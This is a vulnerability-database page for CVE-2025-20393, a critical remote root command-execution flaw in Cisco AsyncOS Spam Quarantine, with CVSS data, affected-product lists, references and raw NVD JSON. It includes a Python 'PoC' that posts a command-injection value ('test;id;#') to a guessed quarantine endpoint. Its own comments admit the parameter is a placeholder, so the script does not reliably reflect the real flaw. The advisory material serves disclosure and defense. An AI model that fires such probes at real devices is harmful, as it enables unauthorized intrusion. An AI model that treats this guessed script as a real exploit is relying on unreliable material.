CVE-2025-20393

Description

A vulnerability in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager could allow an unauthenticated, remote attacker to execute arbitrary system commands on an affected device with root privileges. This vulnerability is due to insufficient validation of HTTP requests by the Spam Quarantine feature. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.

CVSS Details

CVSS Score

10.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c100v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c300v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c600v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:cisco:secure_email_gateway_c195:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:cisco:secure_email_gateway_c395:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m100v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m300v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m600v:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:cisco:secure_email_and_web_manager_m170:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:cisco:secure_email_and_web_manager_m190:-:*:*:*:*:*:*:* - NOT VULNERABLE

Cisco AsyncOS for Secure Email Gateway (具体版本需参考官方公告)

Cisco AsyncOS for Secure Email and Web Manager (具体版本需参考官方公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-20393 PoC - Cisco AsyncOS Spam Quarantine RCE
Note: This is a conceptual PoC for educational and security testing purposes only.
Unauthorized access to systems is illegal.
"""
import requests
import urllib3
urllib3.disable_warnings()

TARGET = "https://<target-ip>/"

def check_vulnerability():
    """Check if target is vulnerable"""
    # Construct malicious request targeting Spam Quarantine
    # The actual exploit requires specific parameter manipulation
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    
    # This is a placeholder - actual exploitation requires
    # understanding the specific vulnerable parameter
    payload = {
        'quarantine_id': 'test;id;#',
        'action': 'view'
    }
    
    try:
        response = requests.post(
            TARGET + 'quarantine/view',
            data=payload,
            headers=headers,
            verify=False,
            timeout=10
        )
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-20393 - Cisco AsyncOS Spam Quarantine RCE")
    print("[*] Use responsibly and only on systems you have permission to test")
    check_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-20393
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-20393
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-20393/
[4] VulDB https://vuldb.com/cve/CVE-2025-20393
[5] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-attack-N9bf4
[6] https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-20393

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-20393", "sourceIdentifier": "[email protected]", "published": "2025-12-17T17:15:48.523", "lastModified": "2026-01-16T14:00:12.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the Spam Quarantine feature of Cisco AsyncOS Software for Cisco Secure Email Gateway and Cisco Secure Email and Web Manager could allow an unauthenticated, remote attacker to execute arbitrary system commands on an affected device with root privileges.\r\n\r\nThis vulnerability is due to insufficient validation of HTTP requests by the Spam Quarantine feature. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "cisaExploitAdd": "2025-12-17", "cisaActionDue": "2025-12-24", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "Cisco Multiple Products Improper Input Validation Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.5-016", "matchCriteriaId": "F7005EE5-0976-4E88-933F-C451D196C057"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.5", "versionEndExcluding": "15.5.4-012", "matchCriteriaId": "81772A3F-141D-4C3D-8094-1BD359D07C4A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.4-016", "matchCriteriaId": "32FF4E02-3750-4654-BD48-126133B33E6A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c100v:-:*:*:*:*:*:*:*", "matchCriteriaId": "5B6FBC8A-8187-4903-B786-6CF341C142B5"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c300v:-:*:*:*:*:*:*:*", "matchCriteriaId": "68864429-9730-43E9-96C3-20B9035BB291"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_gateway_virtual_appliance_c600v:-:*:*:*:*:*:*:*", "matchCriteriaId": "B52D8B2B-E9AE-4B02-87BD-9CF9FA95906A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c195:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B1322B8-1CF9-4B17-9A58-38788051ED4F"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c395:-:*:*:*:*:*:*:*", "matchCriteriaId": "139A640B-1957-4953-AA88-9D373A5152D1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_gateway_c695:-:*:*:*:*:*:*:*", "matchCriteriaId": "F08EA2AD-618B-4834-A52D-73F6A4502DF1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.0.2-007", "matchCriteriaId": "6893AE30-31DE-42CB-A463-E3DE22977107"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.5", "versionEndExcluding": "15.5.4-007", "matchCriteriaId": "12017942-B997-4FB1-B7FF-504EA72AC705"}, {"vulnerable": true, "criteria": "cpe:2.3:o:cisco:asyncos:*:*:*:*:*:*:*:*", "versionStartIncluding": "16.0", "versionEndExcluding": "16.0.4-010", "matchCriteriaId": "F29F71EF-ED63-4DB2-A8BA-EB1E1A3BFF09"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m100v:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C9613A5-B198-4AD2-BC74-F21ABAF79174"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m300v:-:*:*:*:*:*:*:*", "matchCriteriaId": "57831FD6-1CF3-4ABE-81BA-2576418F9083"}, {"vulnerable": false, "criteria": "cpe:2.3:a:cisco:secure_email_and_web_manager_virtual_appliance_m600v:-:*:*:*:*:*:*:*", "matchCriteriaId": "67E804AE-4743-44AD-A364-504B0AB0D9BF"}, {"vulnerable": false, "criteria": "cpe:2.3:h:cisco:secure_email_and_web_manager_m170:-:*:*:*:*:*:*:*", "matchCriteriaId": "3057023B-AD68-4953-A780-75EA416A7B94"}, {"vulnerable": false, "cr ... (truncated)